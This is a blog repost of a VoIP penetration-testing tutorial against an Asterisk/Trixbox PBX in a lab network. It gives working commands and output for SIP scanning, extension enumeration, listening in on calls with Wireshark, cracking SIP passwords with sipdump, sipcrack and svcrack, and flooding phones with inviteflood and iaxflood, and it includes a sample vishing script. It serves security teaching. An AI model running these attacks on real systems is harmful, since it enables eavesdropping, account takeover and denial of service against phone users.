Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1474264
  • 博文数量: 165
  • 博客积分: 2068
  • 博客等级: 上尉
  • 技术积分: 2102
  • 用 户 组: 普通用户
  • 注册时间: 2011-08-27 16:07
文章分类

全部博文(165)

文章存档

2018年(1)

2017年(22)

2016年(9)

2015年(22)

2014年(8)

2013年(25)

2012年(53)

2011年(25)

分类: 网络与安全

2012-07-25 13:33:52

VoIP or voice over IP (Internet protocol) is a transmission mode designed for use in voice and multimedia communications. As IP (Internet protocol)-based networks like the Internet seem to be most successful communications infrastructure, the traditional telephone network is currently being replaced VoIP. Nowadays, its clear improvements and advantages over the old systems make it a popular substitute, with a number of advantages. Among them:

  • The low cost of VoIP as compared to a traditional telephone network. There are any number of services available free of cost (like Skype) that allow you to communicate over distances long or short, PC-to-PC and free of cost.
  • VoIP is portable. Portability and mobility is another advantage of VoIP over traditional telephone; you only need an Internet connection for communication.
  • VoIP service includes a number of different advanced features not normally available with traditional telephone service, including call forwarding, conference call, caller ID, virtual numbers and more.

The advantages are many but this is not our main topic of discussion. (Likewise, there are a number of disadvantages, too: VoIP services depend on Internet connection speed; voice quality depends on the performance of your computer, and so forth). So what is our point in discussing this? What we examine here will be the security aspect of VoIP. In this article, we will review:

  • An overview of VoIP
  • What is Asterisk? (and what are the functionalities)
  • What is Trixbox?
  • VoIP hacking (Penetration testing on an asterisk based network)

With so many aforementioned advantages, VoIP is gaining popularity among both organizations and private users alike. But what about the security issues? As should be entirely predictable, any new technology immediately presents opportunities for those seeking to cause mischief. This is confirmed by reports I’m sure you’ve heard about: not just the phone hacking scandal in Britain, but the hacking in which thieves easily steal confidential information from a victim because their network was not secure.

If you are a pen tester or ethical hacker, then you have an idea about the importance of penetration testing in VoIP, because most of the important communications going on today occur on VoIP and securing confidential information is therefore critical. We will do some practical penetration testing on a VoIP-based network, but first of all I will show you how to build it.

Asterisk is an open-source software that can turn your computer into a communications server. There’s an asterisk software for PBX (private branch exchange) that allows you to make calls and transfer your data.

Trixbox is a wonderful software (or PBX: private branch exchange), based on the asterisk project. It was formally known as but in October 2006 it was renamed Trixbox. The difference between trixbox with other PBX is that trixbox is based on IP (Internet protocol) and has been designed for small and medium sized businesses. There are mainly two version of trixbox available: one is Trixbox CE (a free and open source), while the other – called Trixbox Pro – is one that you will need to purchase.

Protocols & Ports

You must have an idea about the protocols and their ports before attempting to launch actual penetration testing on a VoIP network.

SIP (or session initiation protocol) has been defined by Internet Engineering Task Force (IETF) as the protocol for VoIP communication (in other words: a signaling protocol). SIP uses port 5060 and 5061 for both TCP and UDP.

SDP or session description protocol is for multimedia communications, while MGCP (media gateway control protocol) uses port number 2427 and 2727 for UDP.

RTP (real-time transfer protocol) defines the packets to deliver videos and audios on IP based network like VoIP. RTCP (RTP control protocol) is just like RTP, and it is used to structure the packets that are defined by RTP.

IAX (Inter-Asterisk eXchange) is an important protocol used in the asterisk system and is supported by a different soft-phone and PBX. IAX2 is the second version of IAX and works on the UDP port number 4569.

VoIP Penetration Testing

The process of penetration testing on a VoIP network is generally the same as the penetration testing on any other network. All we need to do is to follow the general guidelines, starting with information gathering, as we would with any form of penetration testing. We will do the same on VoIP network.

Let’s consider a simple scenario: you have found an asterisk-based PBX while doing a penetration test on a network, like the nmap result showing below:

It might be some sort of VoIP server, so a smart penetration tester would use the available tools to learn more about this server. Therefore, in this section I will discuss some of the tools and their usage that will be really helpful in VoIP penetration testing.

SMAP

SMAP is a wonderful scanner that has the ability to detect SIP-enabled devices (it can find a single IP or a range of IPs, to all the subnets) and can locate any VoIP server within an operating system. So it will help to understand the VoIP network.

1root@bt:/pentest/voip/smap# ./smap 192.168.1.9
2
3smap 0.6.0
4
5192.168.1.9: ICMP reachable, SIP enabled
6
7 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

It shows that this host is a VoIP server. Let’s try to gather more information.

01root@bt:/pentest/voip/smap# ./smap -O 192.168.1.9
02
03smap 0.6.0
04
05192.168.1.9: ICMP reachable, SIP enabled
06
07best guess (55% sure) fingerprint:
08
09Asterisk PBX (unknown version)
10
11User-Agent: Asterisk PBX 1.6.0.26-FONCORE-r78
12
13 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

-l: fingerprint learning mode

. It is a wonderful argument that will give us more information.

SIP-Scan

It is just like the SMAP, in that an SIP-scan is also used to detect SIP-enabled devices. Likewise, it has the ability to scan over the entire range of IPs.

1root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254
2
3 192.168.1.9: Asterisk PBX 1.6.0.26-FONCORE-r78
4
5root@bt:/pentest/voip/sipscan#SIPvicious

SIPvicious is a collection of multiple tools (or a tool suite) containing several wonderful implements for VoIP penetration testing purposes. We will discuss the most important – and their usage – in this section.

Svmap

This is a part of the SIPvicious suite. Svmap is a SIP scanner that can scan for SIP-enabled devices within a network. An example to find a VoIP server in a network is shown below.

1root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1/24
2
3| SIP Device | User Agent | Fingerprint |
4
5-------------------------------------------------------------------------------------------------
6
7| 192.168.1.9:5060 | Asterisk PBX 1.6.0.26-FONCORE-r78 | Asterisk / SJphone/1.60.289a (SJ Labs) |
8
9root@bt:/pentest/voip/sipvicious#Extensions Enumeration

Extensions are the devices (may be a phone or desktop computer) that can make calls. Simple extensions are at the end node and connected with the VoIP server to transfer the data. So we need to locate the numbers used to transfer data in order to enumerate on the network further.

Svwar

Svwar is part of the SIPvicious tool suite. It’s used to detect the end user (extensions) on a PBX.

1root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-700 192.168.1.9
2
3| Extension | Authentication |
4
5------------------------------
6
7| 500 | reqauth |
8
9| 600 | reqauth |

Here -e100-700 defines the possible range of extensions.

Now, after doing just a little work, we have a lot of information about this VoIP network. We can now easily develop the network topology (these documents are included in the final report).

Here is the network diagram that I have created, based on the information that we have gathered in the above steps.

Sniffing on VoIP Network

The concept of sniffing in VoIP network is the same as a general network sniffing concept. I will use some of the most famous tools to demonstrate the sniffing attack on VoIP network. Let us start with Wireshark, which is able to capture VoIP traffic.

Now let’s suppose the end users (extensions) are busy communicating with each other, and that an attacker is trying to capture some traffic so that he/she will able to get the data (their communication).

Wireshark has captured some traffic. As discussed above on the protocol section, RTP contains the information. The question now is: how do we extract information from these packets? Wireshark provides the option to extract the information with a built-in feature for VoIP. Click on the telephony tab – VoIP calls you. You will then get this window:

Click on the player, then on the decode tab. You are now able to listen in to this communication and all of the data available in the audio file.

SIP Authentication Cracking (VoIP Cracking)

The importance of password is not a hidden truth, so in this section I will show you how to crack the password of any extension (user) on VoIP network. This attack is the most dangerous, because if an attacker know your password, then he/she will be able to authenticate on the network by using your identity.

The Wireshark result can be used for authentication cracking. Save the result into name.pcap; we will now use a wonderful tool called SIPcrack. It contains two scripts: one, sipdump, which will allow you to dump the authentication data into hashes; the second, sipcrack, which will help you to crack the VoIP password.

01root@bt:~/Desktop/SIPcrack# ./sipdump pass.txt -p aa.pcap
02
03SIPdump 0.3pre ( MaJoMu | )
04
05---------------------------------------
06
07* Using pcap file 'aa.pcap' for sniffing
08
09* Starting to sniff with packet filter 'tcp or udp'
10
11* Dumped login from 192.168.1.9 -> 192.168.1.3 (User: '600')12 13Exiting, sniffed 1 logins

Sipcrack needs a wordlist to launch an attack. As a result, it will give you the password.

Another wonderful tool that will help you to crack the SIP password is svcrack. As with the others, it can be find under the tool suite of sipvicious. Svcrack is wonderful for brute force attacks on SIP accounts.

1root@bt:/pentest/voip/sipvicious# ./svcrack.py -u600 -d list.txt 192.168.1.9
2
3| Extension | Password |
4
5------------------------
6
7| 600 | 12345 |Denial of Service Attack on VoIP Network

Denial of server (DOS) attack is a dangerous attack that can cause the VoIP network and devices to crash. Inviteflood is the tool used to launch DOS attacks against any extensions (user) on the VoIP network. Usage:

1./inviteflood interface targetuser targetdomain floodtarget numberofpackets2./inviteflood eth0 600 192.168.1.3 192.168.1.3 200000

It seems to be a “ping of death” attack and it will crash the end user operating system, disabling the ability of he/she to make any calls.

Iaxflood is another a good tool that can flood the IAX2 protocol; the usage is very simple:

1root@bt:/pentest/voip/iaxflood# ./iaxflood2usage: ./iaxflood sourcename destinationname numpackets

A simple usage like:

01root@bt:/pentest/voip/iaxflood# ./iaxflood 192.168.1.13 192.168.1.2 10000
02
03Will flood port 4569 from port 4569 10000 times
04
05We have IP_HDRINCL
06
07Number of Packets sent:
08
09Sent 10000
10
11root@bt:/pentest/voip/iaxflood#Metasploit on VoIP Penetration Testing

Metasploit has a different auxiliary module for VoIP network. Here is the list of some best auxiliary modules of metasploit for VoIP hacking:

  • auxiliary/scanner/sip/options (To find the SIP enable devices)
  • auxiliary/scanner/sip/enumerator (To enumerate the extensions)

We can do basic VoIP network penetration testing by using metasploit auxiliary modules for information gathering and enumeration. We can scan an entire network to find the SIP enable devices, plus metasploit auxiliary modules are fast.

01msf > use auxiliary/scanner/sip/options
02
03msf auxiliary(options) > set RHOSTS 192.168.1.1/24
04
05RHOSTS => 192.168.1.1/24
06
07msf auxiliary(options) > run
08
09[*] 192.168.1.3 sip:nobody@192.168.1.3 agent='WAcjCpW'
10
11[*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
12
13[*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
14
15[*] Scanned 256 of 256 hosts (100% complete)
16
17[*] Auxiliary module execution completed18 19msf auxiliary(options) >VoIP Phishing

Security awareness is very important. Before concluding this article, I just want to briefly discuss VoIP phishing. Phishing is not a new attack – it is pretty old school – but it remains a threat because hackers usually use some social engineering technique to trick a user before stealing his/her credential information. You might have heard about email phishing, in which an attacker directs the victim to a fake page, so that they will enter their confidential information. In the same fashion, a hacker can hijack your calls to get your credential information.

Let’s suppose someone received a call or email like this:

“Hi, this is an urgent email (call) that has been generated by the network administrator. We have found something wrong with your account, so please call back at XXXX-XXXX-XXX to verify your account.” “

Typically, an unwary user will call back; the hacker may then ask for some confidential information. You need to understand the risk; educate people around you.

文章摘自:
阅读(3198) | 评论(0) | 转发(0) |
0

上一篇:GCC下载和安装

下一篇:VOIP测试工具

给主人留下些什么吧!~~